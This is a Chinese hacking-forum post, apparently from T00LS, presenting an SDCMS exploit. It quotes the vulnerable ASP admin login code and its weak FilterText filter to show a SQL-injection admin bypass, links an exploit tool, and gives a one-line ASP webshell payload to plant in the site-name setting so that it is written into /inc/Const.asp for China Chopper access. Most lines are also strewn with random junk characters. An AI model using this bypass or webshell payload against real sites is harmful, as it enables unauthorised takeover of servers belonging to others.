作者:T00LS 鬼哥; f$ F `2 r8 T, g0 H: E
漏洞文件:后台目录/index.asp1 j) R0 ?9 f. q. ^( t" c7 o
2 `- Y r, k8 x" U
Sub Check
- b- N. t* C: p+ ^$ i* @2 E, t- \ Dim username,password,code,getcode,Rs
U1 o* W+ A1 c' k5 a1 n+ P IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub! w# L3 [8 p% I8 t: y
username=FilterText(Trim(Request.Form("username")),1)) C. p9 q5 X; I! _0 y3 b0 h; T( {0 K
password=FilterText(Trim(Request.Form("password")),1), I3 X. U, p/ c: Z
code=Trim(Request.Form("yzm"))
/ @+ }, V! d- f; L' T getcode=Session("SDCMSCode")+ n+ R# T, Y* |( R& L- }
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died% ]/ z \. W T; g4 N! w( C
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
% H3 I% U% I) } IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)" ied
1 x4 f/ m0 s) \9 s& H* R IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)" ied
3 L8 s0 v/ _; O8 _ IF username="" or password="" Then4 m; ^, S% i; s" b/ a
Echo "用户名或密码不能为空" ied, M! E. _# W" W1 n
Else
2 Q0 s* Y0 P/ A' }0 [ Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")1 P- l; G# p8 O, a5 o
IF Rs.Eof Then$ Y. B+ y6 N6 F3 w
AddLog username,GetIp,"登录失败",1
n. I. Y0 g1 _) i# {- i% T! x1 ] Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"1 E. F' h5 ?- N& x3 ~; V% y' A
Else* R! ?; Q; Y, n* J+ e
Add_Cookies "sdcms_id",Rs(0)* [. z2 F' K6 T+ o" E" P
Add_Cookies "sdcms_name",username/ \# N6 W I. O# R6 ]' s
Add_Cookies "sdcms_pwd",Rs(2)
0 F7 @8 `+ M" C% P Add_Cookies "sdcms_admin",Rs(3)+ e7 P9 g: v* H0 t& }/ U" ]
Add_Cookies "sdcms_alllever",Rs(4)
2 Y O! y; s" x Add_Cookies "sdcms_infolever",Rs(5)
3 [3 ^: r$ b/ }) r& f Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
) w8 i$ p( }9 L AddLog username,GetIp,"登录成功",1
5 q7 n, J: F7 L '自动删除30天前的Log记录
2 B. a( h" Y8 w% r IF Sdcms_DataType Then% y$ o, J7 H/ a
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
6 X2 H, V0 w) G9 H I/ @) K6 c Else& P3 s$ H$ {& o2 {
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")" f5 b& c, l$ R
End IF Z; d4 L) G$ A
Go("sdcms_index.asp")
( x" O Y( ]! u! _# q0 n End IF& Y3 W3 D% X# `0 m1 r; U( R: n4 U
Rs.Close
. f9 o- L' }5 G+ R c Set Rs=Nothing
4 }% h/ }% _) A* f! r! v End IF
% m0 w9 T2 J3 q/ ?7 |$ I" aEnd Sub
' s% _' o- r2 a% J
. f8 m* D" M# C’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
# t6 r- L, z7 _8 w
% Y( g i% Y8 v6 \0 v/ d5 WFunction FilterText(ByVal t0,ByVal t1)* ]1 G( R( ^: \( f
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function+ a9 K3 n3 x* w. ^- j& \# S Z1 n3 X I
t0=Trim(t0)
9 n' u) u/ A% o% b9 m) m6 j Select Case t1( [7 y# D `0 I+ e( C
Case "1"
4 z* x3 `0 t( C t0=Replace(t0,Chr(32),"")
5 F# |, M1 s: f) a. ^' n t0=Replace(t0,Chr(13),"")$ N4 _! a7 R5 |& M6 a
t0=Replace(t0,Chr(10)&Chr(10),"")
* N' I4 E8 {: e3 H& @ t0=Replace(t0,Chr(10),""): X+ D6 [9 C9 M$ x: t+ g$ Q/ w
Case "2"
- }7 Q! |5 }" d+ e& J2 n t0=Replace(t0,Chr(8),"")'回格
0 Y( H6 i6 B) S' \& x8 U. T: c8 P t0=Replace(t0,Chr(9),"")'tab(水平制表符)
6 `, a6 D7 Y3 ~ t! `: o. F t0=Replace(t0,Chr(10),"")'换行4 n% h; n. X5 ]) H: {: h# d) W
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
D; Q# p0 |; y2 {4 U( j5 z4 [& R" T t0=Replace(t0,Chr(12),"")'换页- ^3 e+ n9 A% V7 @5 l* d
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合9 J0 @ x6 T. r, U2 n {- k
t0=Replace(t0,Chr(22),"")$ k9 c' s, ?+ ?- _
t0=Replace(t0,Chr(32),"")'空格 SPACE$ X# w+ r" c: }' E' b% y
t0=Replace(t0,Chr(33),"")'!3 \% A. `+ @& f- j# k6 c, i1 m
t0=Replace(t0,Chr(34),"")'"
z0 H4 G9 X8 | v8 a# F( N5 A t0=Replace(t0,Chr(35),"")'#3 i. \0 S- L. H a# J% j& w
t0=Replace(t0,Chr(36),"")'$
" Y4 F1 N# p+ }- u. z( z t0=Replace(t0,Chr(37),"")'%: [/ b A. B0 M
t0=Replace(t0,Chr(38),"")'&
0 D1 d9 j3 ?$ j# o z6 f' w7 Z t0=Replace(t0,Chr(39),"")''9 o% a7 \! _1 x0 ~" A% i' L, ?
t0=Replace(t0,Chr(40),"")'(& ?! S2 Q: ?, z" R4 M, A
t0=Replace(t0,Chr(41),"")')
# m ] W+ l/ U3 `8 S t0=Replace(t0,Chr(42),"")'*
% o) J7 r3 a. T, w+ o f8 V u t0=Replace(t0,Chr(43),"")'+; X- Y) |# {; a! \
t0=Replace(t0,Chr(44),"")',
! |% \2 n8 g; {0 h* g t0=Replace(t0,Chr(45),"")'-
( W1 W) b7 U; C! R7 g2 e t0=Replace(t0,Chr(46),"")'.
( D6 j7 d: O6 z: h7 I t0=Replace(t0,Chr(47),"")'/- f2 U3 i/ H* u# `) p4 v
t0=Replace(t0,Chr(58),"")':1 o( A5 v5 i, Y5 @% u
t0=Replace(t0,Chr(59),"")';2 w& j; V% W: C' [% }- G
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
2 w8 X. S% l; g2 J) m( H" Z8 f t0=Replace(t0,Chr(63),"")'?
' q8 k; L$ y o! N5 x+ M& Y t0=Replace(t0,Chr(64),"")'@( b/ b7 ` h$ _# L+ m8 M; `
t0=Replace(t0,Chr(91),"")'\
( s C% x, k9 O/ [7 h/ n t0=Replace(t0,Chr(92),"")'\3 h; x' a; }! ?
t0=Replace(t0,Chr(93),"")']
, j; g5 b+ o$ z! \5 P0 K t0=Replace(t0,Chr(94),"")'^
8 L. O, [8 v; g ^$ J5 Y t0=Replace(t0,Chr(95),"")'_
9 C: o8 A: q' J% W1 Z t0=Replace(t0,Chr(96),"")'`' y8 H+ I6 V! ^; K" D
t0=Replace(t0,Chr(123),"")'{) L- W3 y) ?4 W. X
t0=Replace(t0,Chr(124),"")'|3 X3 l- [+ R L
t0=Replace(t0,Chr(125),"")'}' {0 [$ }# X q$ O$ G% z& t
t0=Replace(t0,Chr(126),"")'~
' {+ h% K( v- f+ \$ w Case Else' n# ?8 z: h) d
t0=Replace(t0, "&", "&")) n P9 j; {4 V" O6 I
t0=Replace(t0, "'", "'")
+ h1 f$ v4 t4 B, c t0=Replace(t0, """", """)
3 Z3 d8 d. I3 U/ C3 N6 D& R5 ?' {, ? t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")7 I+ s: V% z# }
End Select; U W+ H7 B" C
IF Instr(Lcase(t0),"expression")>0 Then% i6 o9 S ?4 c
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)% Z+ C7 a# d0 V) j u4 F5 F( Y1 G
End If$ i3 e+ |+ u& t& h. M
FilterText=t09 O( [' U6 w$ n7 q$ |. H& ?$ {" l5 i1 F
End Function
7 q0 z7 n* x7 d$ W% S* ~% t' C d2 q8 m8 v5 d
看到没。直接参数是1 只过滤$ e1 c6 E$ _( ^9 c
t0=Replace(t0,Chr(32)," ")
5 }) `3 }3 B6 A% E: t: [ t0=Replace(t0,Chr(13),"")
( p9 Q% i; G$ b! i5 m: A2 B t0=Replace(t0,Chr(10)&Chr(10),"
3 q% b# z+ Q0 K: K")
, e0 D; Y% m4 o t0=Replace(t0,Chr(10),"
- v% m& G U+ x# c9 S1 d; t/ H4 P")
3 N& D* L3 Y$ Z漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!( e9 P1 f+ |% h5 C Q
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP' ?/ t# j W% \. E' F; R/ Q' ?
7 l. l. G0 o+ F% M+ Q; H
测试:
2 O8 h0 k7 u+ \. k. _5 J7 S" e
* w# I( E, n2 g5 B9 q( c+ o# m
6 e2 n3 P }; } r& N# @现在输入工具上验证码,然后点OK
. O3 w" E( T* [! ?. T' b) Z+ T3 E8 Z( k9 R
/ W' d8 @" e1 ?/ y看到我们直接进入后台管理界面了,呵呵!
# b4 ~( V: ]: [1 v5 v" M8 i9 o
6 G. Q* G7 Z+ W) H0 r1 G. l! d* Y: q) g7 ?" G7 s0 @7 C- B0 k
! e. |( c4 N) ~" j9 T/ d' W$ a) U2 g
这样直接进入后台了。。。。
: h2 c. X' D$ U3 x. M. e% w6 c: Q$ G* g) I; O! q$ X' [$ b) }4 d; R
& G" D5 r, e+ T# E, H. B
/ k$ a! `$ ~% I/ u. N6 F& \' Q
SDCMS提权:
' \1 x0 @2 Y5 [6 t& P! u( ]: f2 U+ S, g. ~# n( f
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
: \9 Y; s$ N; K% n( g9 b9 h/ A" P6 S1 Z! S
@, q# q4 c. }% G0 |/ W3 W! t: L) O2 V B1 Q' s
OK,现在用菜刀连接下!8 q; G: i$ r8 C B
* w; K0 k/ P( S5 @1 A) W
5 Z3 t# v6 x4 i# r/ f% _! C" r4 i O6 I0 B; W2 }
' ]7 M- s+ C# r; c+ p3 s" G: d2 [
|